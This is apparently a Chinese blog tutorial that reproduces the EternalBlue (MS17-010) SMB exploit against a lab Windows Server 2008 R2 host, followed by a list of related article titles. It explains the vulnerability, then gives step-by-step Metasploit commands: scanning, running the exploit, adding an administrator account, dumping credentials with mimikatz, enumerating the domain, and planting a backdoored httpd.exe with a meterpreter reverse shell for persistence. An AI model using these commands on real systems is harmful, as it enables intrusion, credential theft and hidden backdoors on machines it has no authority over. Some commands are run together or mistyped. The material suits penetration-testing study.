永恒之蓝MS17-010漏洞复现

1.永恒之蓝简介

​ 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。

2.漏洞原理

​ 漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时,在大非分页池(内核的数据结构,Large Non-Paged Kernel Pool)上存在缓冲区溢出。函数srv!SrvOs2FeaListToNt在将FEA list转换成NTFEA(Windows NT FEA) list前会调用srv!SrvOs2FeaListSizeToNt去计算转换后的FEA lsit的大小。然后会进行如下操作:

  • srv!SrvOs2FeaListSizeToNt会计算FEA list的大小并更新待转换的FEA list的大小

  • 因为错误的使用WORD强制类型转换,导致计算出来的待转换的FEA list的大小比真正的FEA list大

  • 因为原先的总大小计算错误,导致当FEA list被转化为NTFEA list时,会在非分页池导致缓冲区溢出

3 影响版本

​ 目前已知受影响的Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0

4.漏洞环境搭建

靶机:Windows Server 2008 R2

攻击机: kali

5.复现过程

1.启动靶机

靶机为Windows Server 2008 R2,ip为192.168.1.128

2.端口探测

sudo nmap A -p- -sS sC -T4 -Pn 192.168.1.128

探测到靶机开放445端口,而永恒之蓝利用的就是445端口的smb服务,操作系统溢出漏洞

6.打开MSF进行渗透

msfconsole
search  ms17_010

use auxiliary/scanner/smb/smb_ms17_010       #进行扫描探测
set RHOST 192.168.1.128
run

Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2      #表示存在该漏洞

7.使用漏洞模块进行攻击

use exploit/windows/smb/ms17_010_eternalblue #设置模块
set RHOST 192.168.1.128                         #设置攻击目标

show options     #查看设置情况

exploit          #进行攻击

查看权限信息

shell

         chcp 65001 解决进入shell中中文乱码whoami/groups  查看我们当前的权限getuid   查看已经获得的权限systeminfo  查看系统信息,以及已打的补丁netstat -an   查看开启端口号net user  username  password /add    windows 中添加用户net localgroup administrators username   /add  把添加的用户添加到管理员组useradd –g 组名 用户名 linux下添加用户到root组**使用mimikatz抓取密码**:用于在meterpreter模式下提权为systerm,在32位的进程中比较强大(1)在windows 2000 和 windowsxp中无法使用   (2)mimikatz_command -f hash ::(3)kerberos  抓取系统票据(4)wdigest  获取系统账户信息查询域名称:net view /domain查询域内计算机:net view /doamin:xx查询域控制器时间:net time /domain查询域管理用户:net group "domain admins" /domain得到域控制主机名:net group "domain controllers" /domain获取域控主机名:net group "domain controllers" /domain
拿到shell后
是乱码输入    chcp 65001就好了
创建一个用户
net user kkk 123456abc# /add        #密码不能太简单,否则创建失败

8.上传后门

ps -S httpd.exe
use payload/windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.128
generate -p Windows -x /root/httpd.exe -k -f exe -o /root/httpd-door.exe启动一个监听,监听后门的反向连接,并使用 expolit-j 放到后台
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.128
exploit -j切回之前的 meterpreter session,上传后门文件并重命名
cd c:\\wamp\\bin\\apache\\apache2.2.21\\bin\\
pwd
mv httpd.exe httpd.exe.bak
upload /root/httpd-door.exe
mv httpd-door.exe httpd.exe重启 wampapache 服务
shell
exit

永恒之蓝MS17-010漏洞复现相关推荐

  1. 永恒之蓝(ms17-010)简介与复现

    一.永恒之蓝的介绍 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含"永恒之蓝"工具,"永恒之蓝&q ...

  2. 永恒之蓝和震网病毒复现

    永恒之蓝 1.打开msf 2.漏洞编码查找 search ms17_010 使用:use auxiliary/scanner/smb/smb_ms17_010 靶机探测:set rhosts 192. ...

  3. 关于NSA的EternalBlue(永恒之蓝) ms17-010漏洞利用

            好久没有用这个日志了,最近WannaCry横行,媒体铺天盖地的报道,我这后知后觉的才想起来研究下WannaCry利用的这个原产于美帝的国家安全局发现的漏洞,发现漏洞不说,可以,自己偷偷 ...

  4. 永恒之蓝漏洞复现测试

    永恒之蓝MS17-010漏洞复现及利用 一.什么是永恒之蓝? 永恒之蓝漏洞是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机. SMB(全称是Server Me ...

  5. 【漏洞复现】永恒之蓝 MS17-010 远程溢出漏洞(CVE-2017-0143)

    文章目录 声明 前言 一.漏洞原理简述 二.漏洞代码深层解析 三.实验步骤 四.漏洞补丁 总结 声明 本篇文章仅用于技术研究与技术学习,切勿用于非授权下攻击行为,切记! 前言 Windows7 存在 ...

  6. Metasploit渗透框架介绍及永恒之蓝复现

    Metasploit渗透框架介绍及永恒之蓝复现 一.Metasploit渗透框架介绍 1.1 名词解释 1.2 MSF简介 1.3 MSF框架结构 1.4 MSF命令汇总 1.4.1 常用命令 1.4 ...

  7. 09永恒之蓝与永恒之黑的复现

    一.永恒之蓝 1.简介 2017年3月14日,微软公布SMB远程代码执行漏洞(MS17-010),又称永恒之蓝,该漏洞在 Microsoft 服务器消息块 1.0 (SMBv1) 服务器处理某些请求时 ...

  8. 永恒之蓝(EternalBlue)实例复现

    一.前言 2017年4月的时候,Shadow broker在网络上公布一批NSA(美国国家安全局)使用的网络武器,其中就包含一种工具,可以远程控制有漏洞的任何一台windows机器,正是这些工具的问世 ...

  9. 不死的Eternal Blue(永恒之蓝)

    文章转自公众号:网络安全资源库 搞安全的没有不知道"永恒之蓝"的.当初著名的勒索病毒WannaCry如今已经不多见了,但"永恒之蓝",却还未死. 一.勒索蠕虫时 ...

  10. 20145330 《网络对抗》 Eternalblue(MS17-010)漏洞复现与S2-045漏洞的利用及修复

    20145330 <网络对抗> Eternalblue(MS17-010)漏洞利用工具实现Win 7系统入侵与S2-045漏洞的利用及修复 加分项目: PC平台逆向破解:注入shellco ...

最新文章

  1. 解决每次git pull需要不用输入用户名信息
  2. Java中import及package的用法
  3. 国内网络环境优化qiime2安装过程-QIIME 2安装慢或无法下载的解决方案
  4. 实验三:XML模型(二)
  5. linux线程同步之互斥锁——linux的关键区域
  6. Java后端学习路线【哔哩哔哩网站】【Java基础、SSM框架、Maven、Mysql、Idea的使用、Springboot、Sprinfcloud、设计模式】
  7. Linux——curl(转)
  8. 《WinForm开发系列之控件篇》Item25 Lable(暂无)
  9. tp5中php正则怎么写,详解tp5中phpmailer的使用
  10. 线段树 B数据结构 牛客练习赛28
  11. python下载-【Python下载 官方版】Python 3.8.0-ZOL软件下载
  12. python可以做什么工作-Python入门后,想要从事自由职业可以做哪方面工作?
  13. 电脑音频服务未运行怎么解决_【电脑技能】女生专属,学会这几招也可以修好你的电脑...
  14. 201521123004 《Java程序设计》第2周学习总结
  15. POJ2728 最小比率生成树/0-1分数规划/二分/迭代(迭代不会)
  16. 一键安装lamp环境 centos
  17. 2018-2-13-win10-uwp-如何让WebView标识win10手机
  18. Mozilla发布开发者专用浏览器Fx10
  19. ViewPage2和Fragment以及Tablayout使用
  20. 对抗生成网络(Generative Adversarial Network)

热门文章

  1. PyMOL免费下载及安装教程【Win版】
  2. 403forbidden
  3. 使用Horner法则计算多项式的值
  4. UVA - 10041 Vito's Family (中位数)
  5. 算法入门——数组,链表,选择排序
  6. 【架构师实践课】单体和微服务怎么选?单体到微服务怎么转?
  7. 这2个PDF转Word免费不限页数工具很多人没用过
  8. flutter图标按钮_flutter 导航栏返回按钮带图标
  9. Day 11 Contractions and Present Perfect
  10. python删除表格重复行_python 删除excel表格重复行,数据预处理操作